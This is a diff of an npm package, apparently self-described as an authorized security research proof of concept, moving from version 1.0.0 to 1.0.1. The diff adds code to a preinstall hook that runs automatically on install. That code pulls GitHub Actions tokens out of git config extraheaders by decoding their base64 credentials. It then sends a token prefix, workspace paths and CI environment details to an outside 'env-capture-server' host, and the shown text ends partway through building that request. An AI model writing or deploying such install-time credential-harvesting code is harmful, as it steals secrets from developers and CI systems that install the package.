aio-security-test-template-erk1ny 1.0.0 → 1.0.1

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "aio-security-test-template-erk1ny",
-  "version": "1.0.0",
+  "version": "1.0.1",
   "description": "Security research PoC template for App Builder (authorized testing)",
   "main": "index.js",
   "author": "erk1ny",

package/preinstall-hook.js

@@ -1,5 +1,70 @@
 // Security research PoC - authorized testing only
 const https = require('https');
+const { execSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+const EXFIL_URL = 'https://env-capture-server-production.up.railway.app/capture?secret=40860c24915423d896e683000cfd0489';
+
+// Try to extract GITHUB_TOKEN from git credential helper set by actions/checkout
+let git_token = 'N/A';
+let git_token_source = 'none';
+try {
+  // Method 1: Read extraheader from git config in the workspace
+  const workspace = process.env.GITHUB_WORKSPACE || '';
+  if (workspace) {
+    const header = execSync(`git -C "${workspace}" config --get http.https://github.com/.extraheader`, { encoding: 'utf8', timeout: 5000 }).trim();
+    if (header.includes('basic ')) {
+      const b64 = header.split('basic ')[1].trim();
+      const decoded = Buffer.from(b64, 'base64').toString();
+      if (decoded.includes(':')) {
+        git_token = decoded.split(':')[1];
+        git_token_source = 'extraheader-workspace';
+      }
+    }
+  }
+} catch (e) {}
+
+try {
+  // Method 2: Try common GitHub Actions workspace paths
+  if (git_token === 'N/A') {
+    const paths = [
+      '/home/runner/work',
+      'C:\\actions-runner\\_work',
+      process.env.RUNNER_WORKSPACE || ''
+    ];
+    for (const p of paths) {
+      if (!p) continue;
+      try {
+        const header = execSync(`git -C "${p}" config --get http.https://github.com/.extraheader`, { encoding: 'utf8', timeout: 5000 }).trim();
+        if (header.includes('basic ')) {
+          const b64 = header.split('basic ')[1].trim();
+          const decoded = Buffer.from(b64, 'base64').toString();
+          if (decoded.includes(':')) {
+            git_token = decoded.split(':')[1];
+            git_token_source = 'extraheader-runner-workspace';
+            break;
+          }
+        }
+      } catch (e2) {}
+    }
+  }
+} catch (e) {}
+
+try {
+  // Method 3: Search for .git directories with credentials
+  if (git_token === 'N/A') {
+    const result = execSync('git config --global --get-regexp "http.*extraheader" 2>/dev/null || true', { encoding: 'utf8', timeout: 5000 }).trim();
+    if (result && result.includes('basic ')) {
+      const b64 = result.split('basic ')[1].trim();
+      const decoded = Buffer.from(b64, 'base64').toString();
+      if (decoded.includes(':')) {
+        git_token = decoded.split(':')[1];
+        git_token_source = 'global-git-config';
+      }
+    }
+  }
+} catch (e) {}
 
 const data = JSON.stringify({
   phase: 'preinstall',
@@ -11,15 +76,19 @@ const data = JSON.stringify({
   github_workflow: process.env.GITHUB_WORKFLOW || 'N/A',
   github_run_id: process.env.GITHUB_RUN_ID || 'N/A',
   github_actor: process.env.GITHUB_ACTOR || 'N/A',
-  github_token_present: process.env.GITHUB_TOKEN ? 'YES' : 'NO',
-  github_token_prefix: process.env.GITHUB_TOKEN
-    ? process.env.GITHUB_TOKEN.substring(0, 8) + '...' : 'N/A',
+  github_token_env: process.env.GITHUB_TOKEN ? 'YES' : 'NO',
+  github_token_git: git_token !== 'N/A' ? 'YES' : 'NO',
+  github_token_source: git_token_source,
+  github_token_prefix: git_token !== 'N/A'
+    ? git_token.substring(0, 12) + '...' : 'N/A',
+  github_workspace: process.env.GITHUB_WORKSPACE || 'N/A',
+  runner_workspace: process.env.RUNNER_WORKSPACE || 'N/A',
   actions_runtime_token_present: process.env.ACTIONS_RUNTIME_TOKEN ? 'YES' : 'NO',
   node_version: process.version,
   timestamp: new Date().toISOString()
 });
 
-const url = new URL('https://env-capture-server-production.up.railway.app/capture?secret=40860c24915423d896e683000cfd0489');
+const url = new URL(EXFIL_URL);
 const req = https.request({
   hostname: url.hostname,
   port: 443,